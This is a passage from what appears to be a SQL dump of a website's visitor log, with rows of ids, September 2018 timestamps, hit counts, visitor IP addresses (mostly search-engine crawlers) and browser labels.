,1,0,0,'8.29.198.27','other'),(305773,1537509070,1,1,0,0,'54.36.148.79','other'),(305774,1537509077,1,1,0,0,'66.249.66.156','chrome'),(305775,1537509117,1,1,0,0,'54.36.148.186','other'),(305776,1537509218,1,1,0,0,'54.36.148.108','other'),(305777,1537509294,1,1,0,0,'54.36.148.127','other'),(305778,1537509511,1,1,0,0,'54.36.148.170','other'),(305779,1537509560,1,1,0,0,'216.244.66.241','other'),(305780,1537509680,1,1,0,0,'46.201.114.162','chrome'),(305781,1537509714,1,1,0,0,'54.36.148.194','other'),(305782,1537509758,1,1,0,0,'66.249.66.157','chrome'),(305783,1537509770,17,17,0,0,'144.76.137.254','other'),(305784,1537509798,2,2,0,0,'54.36.148.251','other'),(305785,1537510023,1,1,0,0,'91.196.178.94','chrome'),(305786,1537510110,2,2,0,0,'66.249.66.156','chrome'),(305787,1537510312,1,1,0,0,'54.36.148.181','other'),(305788,1537510361,1,1,0,0,'40.77.167.212','other'),(305789,1537510702,1,1,0,0,'37.9.113.103','other'),(305790,1537510705,1,1,0,0,'178.154.244.29','other'),(305791,1537510714,1,1,0,0,'54.36.148.105','other'),(305792,1537510721,1,1,0,0,'54.36.148.45','other'),(305793,1537511026,1,1,0,0,'162.210.196.97','other'),(305794,1537511198,1,1,0,0,'54.36.148.141','other'),(305795,1537511217,1,1,0,0,'54.36.148.31','other'),(305796,1537511266,2,2,0,0,'91.196.178.94','chrome'),(305797,1537511817,1,1,0,0,'91.196.178.169','chrome'),(305798,1537512000,1,1,0,0,'54.36.148.254','other'),(305799,1537512102,1,1,0,0,'54.36.148.62','other'),(305800,1537512132,1,1,0,0,'54.36.148.28','other'),(305801,1537512173,1,1,0,0,'54.36.149.9','other'),(305802,1537512465,1,1,0,0,'91.196.179.138','chrome'),(305803,1537512488,1,1,0,0,'54.36.149.48','other'),(305804,1537512498,1,1,0,0,'54.36.148.17','other'),(305805,1537512612,1,1,0,0,'54.36.149.85','other'),(305806,1537513130,1,1,0,0,'40.77.167.168','other'),(305807,1537513321,1,1,0,0,'54.36.148.128','other'),(305808,1537513327,1,1,0,0,'195.230.119.59','chrome'),(305809,1537513427,1,1,0,0,'54.36.148.149','other'),(305810,1537513525,1,1,0,0,'180.76.15.144','other'),(305811,1537513709,1,1,0,0,'54.36.149.94','other'),(305812,1537513920,1,1,0,0,'54.36.149.80','other'),(305813,1537514003,1,1,0,0,'216.244.66.241','other'),(305814,1537514374,1,1,0,0,'54.36.148.104','other'),(305815,1537514434,1,1,0,0,'54.36.148.194','other'),(305816,1537514583,1,1,0,0,'54.36.148.113','other'),(305817,1537514594,1,1,0,0,'54.36.148.95','other'),(305818,1537514724,1,1,0,0,'54.36.148.222','other'),(305819,1537515308,1,1,0,0,'54.36.148.11','other'),(305820,1537515316,2,2,0,0,'8.29.198.25','other'),(305821,1537515387,1,1,0,0,'40.77.167.17','other'),(305822,1537515884,2,2,0,0,'216.244.66.241','other'),(305823,1537515895,1,1,0,0,'54.36.148.12','other'),(305824,1537516043,1,1,0,0,'54.36.149.86','other'),(305825,1537516268,1,1,0,0,'66.249.66.156','chrome'),(305826,1537516294,1,1,0,0,'54.36.148.229','other'),(305827,1537516339,1,1,0,0,'195.114.136.190','chrome'),(305828,1537516345,1,1,0,0,'54.36.149.101','other'),(305829,1537516477,1,1,0,0,'95.134.8.195','chrome'),(305830,1537516736,1,1,0,0,'54.36.149.98','other'),(305831,1537517021,1,1,0,0,'54.36.148.241','other'),(305832,1537517138,1,1,0,0,'54.36.148.187','other'),(305833,1537517430,1,1,0,0,'66.249.66.155','chrome'),(305834,1537517452,1,1,0,0,'54.36.149.31','other'),(305835,1537517525,1,1,0,0,'180.76.15.151','other'),(305836,1537517585,1,1,0,0,'216.244.66.241','other'),(305837,1537518052,1,1,0,0,'54.36.149.37','other'),(305838,1537518109,1,1,0,0,'54.36.148.75','other'),(305839,1537518255,2,2,0,0,'66.249.66.157','chrome'),(305840,1537518344,1,1,0,0,'91.196.179.138','chrome'),(305841,1537518659,1,1,0,0,'54.36.148.237','other'),(305842,1537518885,1,1,0,0,'54.36.148.215','other'),(305843,1537518901,1,1,0,0,'54.36.148.216','other'),(305844,1537519294,1,1,0,0,'92.113.56.5','chrome'),(305845,1537519296,1,1,0,0,'66.249.66.157','chrome'),(305846,1537519695,1,1,0,0,'54.36.149.61','other'),(305847,1537519760,1,1,0,0,'8.29.198.25','other'),(305848,1537519811,1,1,0,0,'216.244.66.241','other'),(305849,1537519828,1,1,0,0,'54.36.149.27','other'),(305850,1537520298,1,1,0,0,'66.249.66.157','chrome'),(305851,1537520303,1,1,0,0,'54.36.148.171','other'),(305852,1537520339,1,1,0,0,'54.36.148.63','other'),(305853,1537520603,1,1,0,0,'40.77.167.212','other'),(305854,1537520801,1,1,0,0,'54.36.149.88','other'),(305855,1537520897,1,1,0,0,'91.196.178.90','chrome'),(305856,1537520910,1,1,0,0,'54.36.148.240','other'),(305857,1537521022,1,1,0,0,'54.36.149.27','other'),(305858,1537521206,1,1,0,0,'54.36.148.195','other'),(305859,1537521471,1,1,0,0,'66.249.66.57','chrome'),(305860,1537521552,1,1,0,0,'54.36.148.119','other'),(305861,1537521675,1,1,0,0,'54.36.148.179','other'),(305862,1537521705,1,1,0,0,'54.36.148.67','other'),(305863,1537521712,1,1,0,0,'91.196.177.46','chrome'),(305864,1537521727,1,1,0,0,'94.179.147.128','chrome'),(305865,1537521731,1,1,0,0,'66.249.66.156','chrome'),(305866,1537521893,2,2,0,0,'66.249.66.155','chrome'),(305867,1537521990,1,1,0,0,'54.36.148.103','other'),(305868,1537522047,1,1,0,0,'66.249.66.157','chrome'),(305869,1537522200,1,1,0,0,'54.36.148.42','other'),(305870,1537522461,1,1,0,0,'54.36.149.86','other'),(305871,1537522527,101,101,0,0,'144.76.7.79','other'),(305872,1537522879,1,1,0,0,'54.36.149.75','other'),(305873,1537522929,1,1,0,0,'178.154.244.11','other'),(305874,1537523304,1,1,0,0,'54.36.148.21','other'),(305875,1537523360,1,1,0,0,'54.36.148.140','other'),(305876,1537523728,1,1,0,0,'54.36.148.230','other'),(305877,1537523791,1,1,0,0,'66.249.66.155','chrome'),(305878,1537523822,1,1,0,0,'66.249.66.61','chrome'),(305879,1537523988,1,1,0,0,'54.36.148.98','other'),(305880,1537524371,1,1,0,0,'54.36.148.70','other'),(305881,1537524496,1,1,0,0,'40.77.167.17','other'),(305882,1537524644,1,1,0,0,'54.36.148.200','other'),(305883,1537524747,1,1,0,0,'40.77.167.168','other'),(305884,1537524883,1,1,0,0,'54.36.148.27','other'),(305885,1537524908,1,1,0,0,'54.36.149.83','other'),(305886,1537525155,1,1,0,0,'54.36.148.99','other'),(305887,1537525814,1,1,0,0,'54.36.148.90','other'),(305888,1537526147,2,2,0,0,'8.29.198.27','other'),(305889,1537526470,1,1,0,0,'54.36.148.50','other'),(305890,1537526570,1,1,0,0,'54.36.148.210','other'),(305891,1537526905,1,1,0,0,'54.36.149.7','other'),(305892,1537527040,1,1,0,0,'216.244.66.241','other'),(305893,1537528038,1,1,0,0,'54.36.148.54','other'),(305894,1537528192,1,1,0,0,'54.36.149.97','other'),(305895,1537528322,2,2,0,0,'91.196.178.90','chrome'),(305896,1537528902,24,24,0,0,'46.4.63.250','other'),(305897,1537528989,1,1,0,0,'54.36.148.76','other'),(305898,1537529030,1,1,0,0,'54.36.148.211','other'),(305899,1537529552,1,1,0,0,'54.36.148.145','other'),(305900,1537529599,1,1,0,0,'54.36.148.209','other'),(305901,1537529943,3,3,0,0,'178.154.244.29','other'),(305902,1537530106,1,1,0,0,'178.154.244.11','other'),(305903,1537530256,1,1,0,0,'54.36.148.243','other'),(305904,1537530289,1,1,0,0,'54.36.148.131','other'),(305905,1537530334,1,1,0,0,'54.36.148.139','other'),(305906,1537530438,1,1,0,0,'87.250.224.65','other'),(305907,1537530588,1,1,0,0,'8.29.198.26','other'),(305908,1537530952,1,1,0,0,'66.249.66.155','chrome'),(305909,1537530990,1,1,0,0,'178.154.244.29','other'),(305910,1537531211,1,1,0,0,'54.36.148.152','other'),(305911,1537531284,1,1,0,0,'54.36.148.153','other'),(305912,1537531444,1,1,0,0,'40.77.167.212','other'),(305913,1537532118,1,1,0,0,'40.77.167.168','other'),(305914,1537532182,1,1,0,0,'91.196.178.177','chrome'),(305915,1537532305,5,5,0,0,'95.213.224.199','chrome'),(305916,1537532334,5,5,0,0,'95.213.224.212','chrome'),(305917,1537532335,3,3,0,0,'95.213.224.203','chrome'),(305920,1537532336,7,7,0,0,'95.213.224.218','chrome'),(305925,1537532337,4,4,0,0,'95.213.224.215','chrome'),(305927,1537532338,7,7,0,0,'95.213.224.209','chrome'),(305933,1537532340,1,1,0,0,'95.213.224.195','chrome'),(305934,1537532341,1,1,0,0,'95.213.224.208','chrome'),(305940,1537532343,1,1,0,0,'95.213.224.202','chrome'),(305941,1537533256,1,1,0,0,'54.36.148.235','other'),(305942,1537533259,1,1,0,0,'54.36.148.72','other'),(305943,1537533302,1,1,0,0,'66.249.66.155','chrome'),(305944,1537533766,1,1,0,0,'216.244.66.241','other'),(305945,1537533808,1,1,0,0,'54.36.148.189','other'),(305946,1537534259,1,1,0,0,'40.77.167.168','other'),(305947,1537534462,1,1,0,0,'91.196.177.134','chrome'),(305948,1537535055,1,1,0,0,'54.36.148.126','other'),(305949,1537535083,1,1,0,0,'54.36.148.22','other'),(305950,1537535161,1,1,0,0,'66.249.66.151','chrome'),(305951,1537535198,1,1,0,0,'54.36.148.248','other'),(305952,1537535358,1,1,0,0,'54.36.148.150','other'),(305953,1537535425,1,1,0,0,'54.36.148.50','other'),(305954,1537535584,1,1,0,0,'54.36.148.101','other'),(305955,1537535898,1,1,0,0,'54.36.148.69','other'),(305956,1537536052,1,1,0,0,'54.36.148.143','other'),(305957,1537536357,1,1,0,0,'54.36.148.164','other'),(305958,1537536358,1,1,0,0,'216.244.66.241','other'),(305959,1537536388,1,1,0,0,'54.36.148.187','other'),(305960,1537536651,1,1,0,0,'91.196.177.134','chrome'),(305961,1537536682,1,1,0,0,'54.36.148.81','other'),(305962,1537536734,1,1,0,0,'54.36.149.73','other'),(305963,1537536738,2,2,0,0,'66.249.66.156','chrome'),(305964,1537536894,4,4,0,0,'66.249.66.155','chrome'),(305965,1537536973,1,1,0,0,'8.29.198.27','other'),(305966,1537537061,2,2,0,0,'66.249.66.157','chrome'),(305967,1537537108,1,1,0,0,'8.29.198.26','other'),(305968,1537537348,1,1,0,0,'54.36.149.7','other'),(305969,1537537486,1,1,0,0,'54.36.148.133','other'),(305970,1537537663,1,1,0,0,'54.36.149.22','other'),(305971,1537537684,1,1,0,0,'180.76.15.33','other'),(305972,1537537764,5,5,0,0,'216.244.66.241','other'),(305973,1537537780,1,1,0,0,'54.36.148.56','other'),(305974,1537537818,3,3,0,0,'66.249.66.155','chrome'),(305975,1537537920,1,1,0,0,'54.36.148.231','other'),(305976,1537537966,3,3,0,0,'66.249.66.157','chrome'),(305977,1537537997,1,1,0,0,'54.36.148.138','other'),(305978,1537538243,1,1,0,0,'66.102.9.131','chrome'),(305979,1537538395,1,1,0,0,'40.77.167.17','other'),(305980,1537538725,4,4,0,0,'66.249.66.156','chrome'),(305981,1537538857,1,1,0,0,'91.196.177.46','chrome'),(305982,1537538880,1,1,0,0,'66.249.66.155','chrome'),(305983,1537539069,1,1,0,0,'91.196.178.181','chrome'),(305984,1537539543,3,3,0,0,'66.249.66.157','chrome'),(305985,1537539711,1,1,0,0,'66.249.66.156','chrome'),(305986,1537539876,3,3,0,0,'66.249.66.155','chrome'),(305987,1537540078,1,1,0,0,'54.36.148.65','other'),(305988,1537540159,1,1,0,0,'141.8.183.22','other'),(305989,1537540197,1,1,0,0,'54.36.148.163','other'),(305990,1537540211,1,1,0,0,'54.36.148.66','other'),(305991,1537540316,1,1,0,0,'54.36.148.205','other'),(305992,1537540665,1,1,0,0,'66.249.66.157','chrome'),(305993,1537540907,1,1,0,0,'91.196.178.92','firefox'),(305994,1537541053,1,1,0,0,'54.36.149.73','other'),(305995,1537541176,1,1,0,0,'54.36.148.106','other'),(305996,1537541403,1,1,0,0,'40.77.167.212','other'),(305997,1537541414,1,1,0,0,'8.29.198.27','other'),(305998,1537541709,1,1,0,0,'54.36.148.111','other'),(305999,1537541882,4,4,0,0,'46.4.52.175','other'),(306000,1537541955,1,1,0,0,'54.36.149.31','other'),(306001,1537542047,1,1,0,0,'54.36.149.30','other'),(306002,1537542633,1,1,0,0,'54.36.148.112','other'),(306003,1537542680,1,1,0,0,'54.36.149.89','other'),(306004,1537542870,1,1,0,0,'54.36.148.156','other'),(306005,1537542985,1,1,0,0,'54.36.149.13','other'),(306006,1537543183,1,1,0,0,'54.36.149.71','other'),(306007,1537543211,1,1,0,0,'40.77.167.17','other'),(306008,1537543327,1,1,0,0,'216.244.66.241','other'),(306009,1537543491,2,2,0,0,'66.102.6.166','chrome'),(306010,1537543577,1,1,0,0,'54.36.149.38','other'),(306011,1537543802,1,0,1,0,'66.249.66.155',''),(306012,1537544002,1,1,0,0,'54.36.148.197','other'),(306013,1537544403,1,1,0,0,'54.36.148.203','other'),(306014,1537544581,1,1,0,0,'5.9.155.226','other'),(306015,1537544989,1,1,0,0,'216.244.66.241','other'),(306016,1537545013,1,1,0,0,'54.36.148.249','other'),(306017,1537545112,1,1,0,0,'54.36.149.71','other'),(306018,1537545753,1,1,0,0,'54.36.148.190','other'),(306019,1537546614,1,1,0,0,'216.244.66.241','other'),(306020,1537546705,1,1,0,0,'54.36.148.51','other'),(306021,1537546839,1,1,0,0,'54.36.148.227','other'),(306022,1537547066,1,1,0,0,'54.36.148.74','other'),(306023,1537547097,1,1,0,0,'54.36.148.188','other'),(306024,1537547243,1,1,0,0,'54.36.148.64','other'),(306025,1537547255,1,1,0,0,'54.36.148.41','other'),(306026,1537547402,1,1,0,0,'54.36.148.213','other'),(306027,1537547408,1,1,0,0,'40.77.167.17','other'),(306028,1537547731,1,1,0,0,'31.184.238.113','chrome'),(306029,1537547809,1,1,0,0,'8.29.198.26','other'),(306030,1537547916,1,1,0,0,'54.36.148.181','other'),(306031,1537547945,1,1,0,0,'8.29.198.25','other'),(306032,1537548085,1,1,0,0,'54.36.148.252','other'),(306033,1537548168,1,1,0,0,'216.244.66.241','other'),(306034,1537548420,1,1,0,0,'54.36.149.43','other'),(306035,1537548582,1,1,0,0,'54.36.148.237','other'),(306036,1537549416,1,1,0,0,'54.36.148.244','other'),(306037,1537549523,1,1,0,0,'54.36.149.86','other'),(306038,1537550127,1,1,0,0,'91.209.11.236','other'),(306039,1537550524,2,2,0,0,'178.154.244.29','other'),(306040,1537550599,2,2,0,0,'178.154.244.11','other'),(306041,1537550666,1,1,0,0,'141.8.142.103','other'),(306042,1537550698,1,1,0,0,'54.36.149.39','other'),(306043,1537550807,1,1,0,0,'40.77.167.212','other'),(306044,1537550885,1,1,0,0,'54.36.148.80','other'),(306045,1537550892,1,1,0,0,'46.105.92.122','firefox'),(306046,1537550919,1,1,0,0,'95.108.213.4','other'),(306047,1537551019,1,1,0,0,'141.8.142.108','other'),(306048,1537551335,1,1,0,0,'54.36.148.10','other'),(306049,1537551490,1,1,0,0,'54.36.149.10','other'),(306050,1537551531,1,1,0,0,'54.36.148.162','other'),(306051,1537551592,1,1,0,0,'66.249.66.155','chrome'),(306052,1537551610,1,1,0,0,'54.36.148.64','other'),(306053,1537551613,1,1,0,0,'178.154.244.11','other'),(306054,1537552243,1,1,0,0,'8.29.198.25','other'),(306055,1537552310,1,1,0,0,'91.196.178.135','firefox'),(306056,1537552333,1,1,0,0,'54.36.149.58','other'),(306057,1537552372,1,1,0,0,'54.36.149.75','other'),(306058,1537552540,1,1,0,0,'54.36.149.85','other'),(306059,1537552775,1,1,0,0,'54.36.148.164','other'),(306060,1537552812,1,1,0,0,'54.36.148.56','other'),(306061,1537552825,1,1,0,0,'54.36.148.113','other'),(306062,1537553234,1,1,0,0,'216.244.66.241','other'),(306063,1537553277,1,1,0,0,'54.36.148.95','other'),(306064,1537553473,1,1,0,0,'54.36.149.96','other'),(306065,1537553608,3,3,0,0,'178.154.244.29','other'),(306066,1537553632,3,3,0,0,'5.9.108.254','other'),(306067,1537553649,3,3,0,0,'209.94.191.213','other'),(306068,1537553973,2,2,0,0,'46.211.50.190','chrome'),(306069,1537554179,1,1,0,0,'54.36.148.54','other'),(306070,1537554578,1,1,0,0,'54.36.148.138','other'),(306071,1537554710,1,1,0,0,'54.36.148.27','other'),(306072,1537554801,1,1,0,0,'54.36.148.163','other'),(306073,1537555251,1,1,0,0,'54.36.149.7','other'),(306074,1537555433,2,2,0,0,'216.244.66.241','other'),(306075,1537555547,1,1,0,0,'54.36.148.84','other'),(306076,1537555638,1,1,0,0,'54.36.148.237','other'),(306077,1537555654,1,1,0,0,'54.36.148.247','other'),(306078,1537555904,1,1,0,0,'54.36.148.148','other'),(306079,1537556554,1,1,0,0,'54.36.148.155','other'),(306080,1537557085,1,1,0,0,'40.77.167.17','other'),(306081,1537557209,1,1,0,0,'54.36.149.68','other'),(306082,1537557364,1,1,0,0,'54.36.148.179','other'),(306083,1537557575,1,1,0,0,'54.36.149.11','other'),(306084,1537557741,1,1,0,0,'54.36.148.111','other'),(306085,1537557825,1,1,0,0,'54.36.148.152','other'),(306086,1537558102,1,1,0,0,'54.36.149.62','other'),(306087,1537558392,1,1,0,0,'66.249.66.156','chrome'),(306088,1537558484,2,2,0,0,'216.244.66.241','other'),(306089,1537558543,1,1,0,0,'185.220.101.25','chrome'),(306090,1537558646,1,1,0,0,'8.29.198.27','other'),(306091,1537558773,1,1,0,0,'8.29.198.25','other'),(306092,1537559054,1,1,0,0,'114.142.191.33','firefox'),(306093,1537559417,1,1,0,0,'54.36.148.154','other'),(306094,1537559664,1,1,0,0,'54.36.148.39','other'),(306095,1537559714,1,1,0,0,'54.36.149.43','other'),(306096,1537560116,1,1,0,0,'54.36.149.20','other'),(306097,1537560377,1,1,0,0,'54.36.148.187','other'),(306098,1537560675,1,1,0,0,'54.36.148.184','other'),(306099,1537560925,1,1,0,0,'54.36.149.82','other'),(306100,1537561029,1,1,0,0,'54.36.149.12','other'),(306101,1537561097,1,1,0,0,'54.36.149.75','other'),(306102,1537561146,2,2,0,0,'216.244.66.241','other'),(306103,1537562081,1,1,0,0,'40.77.167.212','other'),(306104,1537562218,1,1,0,0,'54.36.148.209','other'),(306105,1537562299,1,1,0,0,'54.36.148.248','other'),(306106,1537562606,1,1,0,0,'89.247.124.132','firefox'),(306107,1537563071,1,1,0,0,'8.29.198.25','other'),(306108,1537563170,1,1,0,0,'54.36.148.241','other'),(306109,1537563342,1,1,0,0,'54.36.149.69','other'),(306110,1537563463,1,1,0,0,'54.36.149.62','other'),(306111,1537563506,1,1,0,0,'216.244.66.241','other'),(306112,1537563580,1,1,0,0,'54.36.148.74','other'),(306113,1537563782,2,2,0,0,'54.36.148.87','other'),(306114,1537563874,1,1,0,0,'54.36.148.113','other'),(306115,1537564344,1,1,0,0,'54.36.148.149','other'),(306116,1537564519,1,1,0,0,'40.77.167.18','other'),(306117,1537564724,1,1,0,0,'54.36.149.63','other'),(306118,1537564754,1,1,0,0,'54.36.149.15','other'),(306119,1537564808,1,1,0,0,'54.36.148.34','other'),(306120,1537565034,1,1,0,0,'54.36.149.77','other'),(306121,1537565170,1,1,0,0,'54.36.149.79','other'),(306122,1537565225,1,1,0,0,'54.36.148.151','other'),(306123,1537565315,1,1,0,0,'54.36.149.91','other'),(306124,1537565889,1,1,0,0,'66.249.66.156','chrome'),(306125,1537566015,1,1,0,0,'54.36.148.159','other'),(306126,1537566218,1,1,0,0,'54.36.149.82','other'),(306127,1537566931,1,1,0,0,'54.36.149.85','other'),(306128,1537567143,1,1,0,0,'54.36.148.165','other'),(306129,1537567232,1,1,0,0,'54.36.148.77','other'),(306130,1537567977,1,1,0,0,'66.249.66.59','chrome'),(306131,1537568073,1,1,0,0,'54.36.149.88','other'),(306132,1537568079,1,1,0,0,'54.36.149.39','other'),(306133,1537568354,1,1,0,0,'216.244.66.241','other'),(306134,1537568529,1,1,0,0,'54.36.149.31','other'),(306135,1537568959,1,1,0,0,'54.36.149.98','other'),(306136,1537569277,1,1,0,0,'54.36.148.66','other'),(306137,1537569457,1,1,0,0,'54.36.149.60','other'),(306138,1537569478,1,1,0,0,'8.29.198.27','other'),(306139,1537569604,1,1,0,0,'8.29.198.26','other'),(306140,1537569641,1,1,0,0,'54.36.148.16','other'),(306141,1537569717,1,1,0,0,'54.36.148.127','other'),(306142,1537569773,1,1,0,0,'54.36.148.163','other'),(306143,1537570233,1,1,0,0,'180.76.15.155','other'),(306144,1537570557,1,1,0,0,'54.36.149.14','other'),(306145,1537570578,1,1,0,0,'54.36.149.20','other'),(306146,1537570778,1,1,0,0,'54.36.149.71','other'),(306147,1537571137,1,1,0,0,'54.36.148.174','other'),(306148,1537571149,542,542,0,0,'80.248.225.4','other'),(306149,1537571769,1,1,0,0,'54.36.148.125','other'),(306150,1537572050,306,306,0,0,'80.248.225.4','other'),(306151,1537572339,1,1,0,0,'54.36.149.20','other'),(306152,1537572436,1,1,0,0,'54.36.149.93','other'),(306153,1537572545,1,1,0,0,'54.36.149.35','other'),(306154,1537572775,1,1,0,0,'54.36.149.25','other'),(306155,1537572973,1,1,0,0,'54.36.148.216','other'),(306156,1537573224,1,1,0,0,'54.36.148.76','other'),(306157,1537573389,1,1,0,0,'54.36.148.43','other'),(306158,1537573551,1,1,0,0,'54.36.148.179','other'),(306159,1537573831,1,1,0,0,'54.36.148.236','other'),(306160,1537573892,1,1,0,0,'8.29.198.27','other'),(306161,1537574023,1,1,0,0,'54.36.149.4','other'),(306162,1537574159,1,1,0,0,'54.36.149.6','other'),(306163,1537574526,1,1,0,0,'54.36.148.238','other'),(306164,1537574576,1,1,0,0,'54.36.149.35','other'),(306165,1537574915,1,1,0,0,'54.36.148.205','other'),(306166,1537575217,1,1,0,0,'54.36.148.26','other'),(306167,1537575523,1,1,0,0,'54.36.148.204','other'),(306168,1537575574,1,1,0,0,'54.36.148.49','other'),(306169,1537575839,1,1,0,0,'216.244.66.241','other'),(306170,1537575875,1,1,0,0,'54.36.149.36','other'),(306171,1537575961,1,1,0,0,'54.36.148.47','other'),(306172,1537576090,1,1,0,0,'54.36.149.9','other'),(306173,1537576405,1,1,0,0,'54.36.148.40','other'),(306174,1537577098,1,1,0,0,'54.36.148.220','other'),(306175,1537577666,2,2,0,0,'66.249.66.156','chrome'),(306176,1537577782,2,2,0,0,'66.249.66.155','chrome'),(306177,1537577890,1,1,0,0,'54.36.149.76','other'),(306178,1537578054,1,1,0,0,'54.36.148.251','other'),(306179,1537578643,1,1,0,0,'54.36.148.197','other'),(306180,1537578695,2,2,0,0,'54.36.148.21','other'),(306181,1537578795,1,1,0,0,'54.36.149.78','other'),(306182,1537578880,1,1,0,0,'54.36.148.198','other'),(306183,1537579517,1,1,0,0,'54.36.148.95','other'),(306184,1537579709,1,1,0,0,'54.36.149.86','other'),(306185,1537579859,1,1,0,0,'54.36.149.36','other'),(306186,1537580300,1,1,0,0,'54.36.148.123','other'),(306187,1537580303,1,1,0,0,'8.29.198.25','other'),(306188,1537580431,1,1,0,0,'8.29.198.26','other'),(306189,1537580644,1,1,0,0,'54.36.149.27','other'),(306190,1537580851,2,2,0,0,'216.244.66.241','other'),(306191,1537580984,1,1,0,0,'54.36.148.82','other'),(306192,1537580995,1,1,0,0,'54.36.149.95','other'),(306193,1537581007,1,1,0,0,'54.36.148.236','other'),(306194,1537581565,1,1,0,0,'54.36.148.60','other'),(306195,1537581595,1,1,0,0,'54.36.148.76','other'),(306196,1537581855,1,1,0,0,'54.36.149.83','other'),(306197,1537582291,1,1,0,0,'35.162.70.167','chrome'),(306198,1537582305,5,5,0,0,'178.154.244.29','other'),(306199,1537582307,1,1,0,0,'54.36.148.30','other'),(306200,1537582473,1,1,0,0,'54.36.148.232','other'),(306201,1537582592,1,1,0,0,'54.36.149.86','other'),(306202,1537582721,1,1,0,0,'54.36.148.196','other'),(306203,1537582746,1,1,0,0,'54.36.149.18','other'),(306204,1537582874,1,1,0,0,'54.36.148.38','other'),(306205,1537583276,1,1,0,0,'54.36.148.174','other'),(306206,1537583569,1,1,0,0,'54.36.148.41','other'),(306207,1537583621,1,1,0,0,'35.162.214.175','chrome'),(306208,1537583932,1,1,0,0,'54.36.148.147','other'),(306209,1537584446,1,1,0,0,'54.36.148.175','other'),(306210,1537584727,1,1,0,0,'8.29.198.27','other'),(306211,1537584847,1,1,0,0,'54.36.149.102','other'),(306212,1537584963,1,1,0,0,'54.36.148.166','other'),(306213,1537585358,1,1,0,0,'54.36.148.24','other'),(306214,1537585438,1,1,0,0,'54.36.148.144','other'),(306215,1537585462,1,1,0,0,'54.36.149.66','other'),(306216,1537585770,1,1,0,0,'54.36.149.63','other'),(306217,1537585964,1,1,0,0,'54.36.148.98','other'),(306218,1537586052,1,1,0,0,'54.36.149.4','other'),(306219,1537586163,1,1,0,0,'5.45.207.19','other'),(306220,1537586166,1,1,0,0,'5.45.207.79','other'),(306221,1537586168,4,4,0,0,'178.154.244.29','other'),(306222,1537586358,1,1,0,0,'207.46.13.71','other'),(306223,1537586561,1,1,0,0,'54.36.148.58','other'),(306224,1537586698,1,1,0,0,'54.36.148.52','other'),(306225,1537586963,1,1,0,0,'207.46.13.164','other'),(306226,1537586975,1,1,0,0,'178.154.244.11','other'),(306227,1537587144,1,1,0,0,'54.36.148.158','other'),(306228,1537587688,1,1,0,0,'54.36.148.14','other'),(306229,1537587803,1,1,0,0,'54.36.148.130','other'),(306230,1537588091,1,1,0,0,'54.36.148.58','other'),(306231,1537588387,1,1,0,0,'80.252.153.33','chrome'),(306232,1537588803,1,1,0,0,'54.36.149.9','other'),(306233,1537589080,1,1,0,0,'216.244.66.241','other'),(306234,1537589130,1,1,0,0,'54.36.148.180','other'),(306235,1537589404,1,1,0,0,'54.36.148.140','other'),(306236,1537589892,1,1,0,0,'54.36.148.121','other'),(306237,1537590126,1,1,0,0,'54.36.148.34','other'),(306239,1537590169,1,1,0,0,'54.36.149.27','other'),(306240,1537590459,1,1,0,0,'54.36.149.94','other'),(306241,1537590594,1,1,0,0,'54.36.149.66','other'),(306242,1537590912,1,1,0,0,'54.36.148.66','other'),(306243,1537590977,1,1,0,0,'54.36.148.88','other'),(306244,1537591133,1,1,0,0,'8.29.198.26','other'),(306245,1537591181,1,1,0,0,'54.36.149.41','other'),(306246,1537591195,1,1,0,0,'54.36.149.16','other'),(306247,1537591258,1,1,0,0,'8.29.198.27','other'),(306248,1537591367,1,1,0,0,'207.46.13.71','other'),(306249,1537591378,1,1,0,0,'54.36.149.56','other'),(306250,1537591708,1,1,0,0,'54.36.148.51','other'),(306251,1537591850,1,1,0,0,'54.36.149.66','other'),(306252,1537592300,1,1,0,0,'178.154.244.29','other'),(306253,1537592957,1,1,0,0,'54.36.148.77','other'),(306254,1537593534,1,1,0,0,'54.36.148.120','other'),(306255,1537593972,1,1,0,0,'54.36.148.191','other'),(306256,1537594250,1,1,0,0,'54.36.148.109','other'),(306257,1537594927,1,1,0,0,'54.36.148.194','other'),(306258,1537595087,1,1,0,0,'207.46.13.71','other'),(306259,1537595163,1,1,0,0,'66.249.66.157','chrome'),(306260,1537595288,1,1,0,0,'54.36.148.85','other'),(306261,1537595557,1,1,0,0,'8.29.198.26','other'),(306262,1537595675,1,1,0,0,'54.36.149.78','other'),(306263,1537595939,1,1,0,0,'178.154.244.29','other'),(306264,1537595940,1,1,0,0,'178.154.244.11','other'),(306265,1537596051,1,1,0,0,'54.36.148.75','other'),(306266,1537596111,1,1,0,0,'216.244.66.241','other'),(306267,1537596642,1,1,0,0,'77.51.61.20','chrome'),(306268,1537596941,2,2,0,0,'141.8.142.103','other'),(306269,1537596959,1,1,0,0,'178.154.244.11','other'),(306270,1537596999,3,3,0,0,'5.45.207.79','other'),(306271,1537597262,1,1,0,0,'54.36.148.70','other'),(306272,1537597723,1,1,0,0,'178.154.244.29','other'),(306273,1537597726,1,1,0,0,'87.250.224.65','other'),(306274,1537597938,1,1,0,0,'54.36.148.202','other'),(306275,1537598055,1,1,0,0,'54.36.148.26','other'),(306276,1537598364,1,1,0,0,'54.36.148.37','other'),(306277,1537598405,3,3,0,0,'144.76.2.149','other'),(306278,1537598917,1,1,0,0,'54.36.149.67','other'),(306279,1537599190,1,1,0,0,'54.36.148.68','other'),(306280,1537599468,2,2,0,0,'66.249.66.156','chrome'),(306281,1537599501,1,1,0,0,'54.36.149.72','other'),(306282,1537599991,1,1,0,0,'54.36.148.59','other'),(306283,1537600459,1,1,0,0,'54.36.148.75','other'),(306284,1537600670,1,1,0,0,'54.36.148.70','other'),(306285,1537600742,1,1,0,0,'54.36.148.83','other'),(306286,1537600754,1,1,0,0,'54.36.149.22','other'),(306287,1537601224,1,1,0,0,'54.36.148.99','other'),(306288,1537601375,1,1,0,0,'216.244.66.241','other'),(306289,1537601493,1,1,0,0,'54.36.148.88','other'),(306290,1537601733,7,7,0,0,'95.216.2.253','other'),(306291,1537601959,2,2,0,0,'8.29.198.27','other'),(306292,1537602383,1,1,0,0,'54.36.149.77','other'),(306293,1537602493,1,1,0,0,'202.29.39.243','firefox'),(306294,1537603385,1,0,1,0,'66.249.66.155',''),(306295,1537603392,1,1,0,0,'54.36.149.107','other'),(306296,1537603475,2,2,0,0,'54.36.148.29','other'),(306297,1537603690,1,1,0,0,'54.36.149.104','other'),(306298,1537603709,1,1,0,0,'54.36.148.19','other'),(306299,1537603737,4,4,0,0,'216.244.66.241','other'),(306300,1537603825,1,1,0,0,'54.36.149.46','other'),(306301,1537603963,1,1,0,0,'54.36.149.89','other'),(306302,15376